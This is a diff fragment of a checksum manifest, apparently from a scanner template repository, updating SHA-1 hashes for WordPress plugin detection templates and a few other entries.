-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2
-http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23
-http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7
-http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317
-http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461
-http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4
-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:f4867c229ee945f162265d86e1e20f9e908f32da
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
 http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85
+http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
-http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7194,7 +7195,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:6974e374bee15047e629369d2bfa5073d4a50bbc
+templates-checksum.txt:61d84a877ff8fcbfad8135b36533649bd26beddd
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

